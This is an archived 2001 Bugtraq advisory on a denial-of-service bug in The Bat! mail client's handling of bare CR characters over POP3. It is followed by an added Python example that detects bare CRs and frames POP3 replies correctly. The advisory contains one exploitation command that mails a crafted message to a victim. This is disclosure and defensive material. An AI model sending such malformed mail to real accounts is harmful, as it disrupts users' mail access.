[20330] in bugtraq
SECURITY.NNOV: The Bat! bug
daemon@ATHENA.MIT.EDU (3APA3A)
Fri Apr 20 00:23:48 2001
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------11191C1F46A565"
Message-ID: <699942416.20010418170456@SECURITY.NNOV.RU>
Date: Wed, 18 Apr 2001 17:04:56 +0400
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
------------11191C1F46A565
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
There is more fun than security impact in this issue, but it's a kind
of DoS and can give a lot of headaches to postmasters.
=-------8<----------------------------------
SECURITY.NNOV URL: http://www.security.nnov.ru
Topic: The Bat! <cr> bug
Application: The Bat! 1.51 (latest)
Vendor: RitLabs
Category: Denial of Service
Risk Factor: Low
Remote: Yes
Vendor Contacted: 13.04.2001
Software URL: http://www.thebat.net
Vendor URL: http://www.ritlabs.com
+Introduction:
The Bat! is a very convenient commercially available MUA for Windows
with a lot of features.
+Details:
While RETRieving a message via POP3 (IMAP isn't tested) The Bat!
incorrectly processes the 0x0D (CR) character if it's not followed by
0x0A (LF). The Bat! incorrectly calculates the end of the message and
part of the message is treated as a reply from the POP3 server. The Bat!
fails to receive the rest of the messages and fails to delete received
messages from the server. This leads to DoS against the user's POP3
account. A malformed message can emulate any POP3 server reply.
+Exploitation:
Extract attached "badmessage" and send it, e.g. using
cat badmessage | sendmail -U victim@somewhere.net
or copy it to user's mailbox.
This message causes The Bat! to show something like:
!13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--
The message is crafted not to contain this text anywhere in the body.
+Workaround:
Use the "Dispatch Mail on Server" feature to delete the malformed message
from the server or use a different MUA.
+Solution:
Not yet.
+Vendor:
RitLabs was contacted on April 13 (happy Easter to you, guys). No
feedback yet.
This advisory is being provided to you under RFPolicy v.2 documented
at http://www.wiretrip.net/rfp/policy.html.
--
http://www.security.nnov.ru
/\_/\
{ . . } |\
+--oQQo->{ ^ }<-----+ \
| 3APA3A U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
------------11191C1F46A565
Content-Type: application/x-zip-compressed; name="badmess.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="badmess.zip"
------------11191C1F46A565--
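Added example, not part of the original advisory or of any vendor code: a postmaster-side check that flags bare CR bytes in a stored message, and a POP3 multi-line reader that frames a RETR response the way RFC 1939 defines it (CRLF line ends, a lone "." line as terminator), so a bare CR stays message data. The function names and the sample bytes are constructed for illustration.

```python
import io

def find_bare_cr(raw: bytes) -> list[int]:
    """Offsets of every CR (0x0D) that is not immediately followed by LF (0x0A)."""
    return [i for i, b in enumerate(raw)
            if b == 0x0D and raw[i + 1:i + 2] != b"\n"]

def read_multiline(stream) -> bytes:
    """Read one POP3 multi-line response body (the part after the +OK status line)."""
    out, buf = bytearray(), bytearray()
    while True:
        ch = stream.read(1)
        if not ch:
            raise EOFError("stream ended before the terminating '.' line")
        buf += ch
        if not buf.endswith(b"\r\n"):
            continue                  # only CRLF ends a line; a bare CR is data
        line = bytes(buf[:-2])
        buf.clear()
        if line == b".":              # a line holding a single dot ends the response
            return bytes(out)
        if line.startswith(b"."):
            line = line[1:]           # undo dot-stuffing
        out += line + b"\r\n"

def split_retr(wire: bytes) -> tuple[bytes, bytes]:
    """Return (message, bytes left on the connection after the message)."""
    stream = io.BytesIO(wire)
    return read_multiline(stream), stream.read()

# Constructed sample: the body holds a bare CR followed by reply-like text.
SAMPLE_MESSAGE = (b"Subject: constructed sample\r\n\r\n"
                  b"first line\r-ERR constructed text after a bare CR\r\n"
                  b"last line\r\n")
# Constructed wire data: the message, its terminator, then the next server reply.
SAMPLE_WIRE = SAMPLE_MESSAGE + b".\r\n" + b"+OK next reply\r\n"

if __name__ == "__main__":
    print("bare CR offsets:", find_bare_cr(SAMPLE_MESSAGE))
    message, rest = split_retr(SAMPLE_WIRE)
    print("message intact:", message == SAMPLE_MESSAGE, "| next reply:", rest)
```

A delivery agent or mail filter can use the offsets from `find_bare_cr` to quarantine such a message or rewrite each bare CR to CRLF before it reaches the mailbox.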